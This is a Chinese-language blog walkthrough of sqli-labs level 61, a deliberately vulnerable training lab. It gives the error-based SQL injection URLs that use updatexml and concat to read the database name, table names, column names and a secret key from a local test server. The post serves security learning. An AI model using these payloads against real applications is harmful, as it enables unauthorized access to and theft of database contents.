sqli-labs (less-61)

其他 2021-03-22 08:44:30 阅读次数: 0

sqli-labs (less-61)

进入61关,直接输入

http://127.0.0.1/sql1/Less-61/?id=1'


根据错误信息,判断闭合方式为’))–+,并且为字符型注入
因为有完整错误显示,所以我们使用报错注入攻击

查看当前库

http://127.0.0.1/sql1/Less-61/?id=1')) and updatexml(1,concat(0x7e,(database()),0x7e),1)--+


查看challenges库下的所有表

http://127.0.0.1/sql1/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+


查看m6s7soy5rj表下的所有字段

http://127.0.0.1/sql1/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='m6s7soy5rj'),0x7e),1)--+


查看secret_3LSV字段下的值

http://127.0.0.1/sql1/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(secret_3LSV) from challenges.m6s7soy5rj),0x7e),1)--+


将查询到的KEY提交

猜你喜欢

转载自blog.csdn.net/kukudeshuo/article/details/114857093
今日推荐
周排行
Leetcode简单题61~80
解决zookeeper磁盘IO高的问题
多线程相关方法详解
Maven-setting.xml文件详解
Maven 项目的 classpath 理解
渊亭科技大数据笔试题
配置JVM内存分配
计算机网络个人学习笔记 (三)网络层 :第三部分 连载
js中两个等号(==)和三个等号(===)的区别
用C程序自动打开电脑上的程序
每日归档
更多
2024-09-18(0)
2024-09-17(0)
2024-09-16(0)
2024-09-15(0)
2024-09-14(0)
2024-09-13(0)
2024-09-12(0)
2024-09-11(0)
2024-09-10(0)
2024-09-09(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022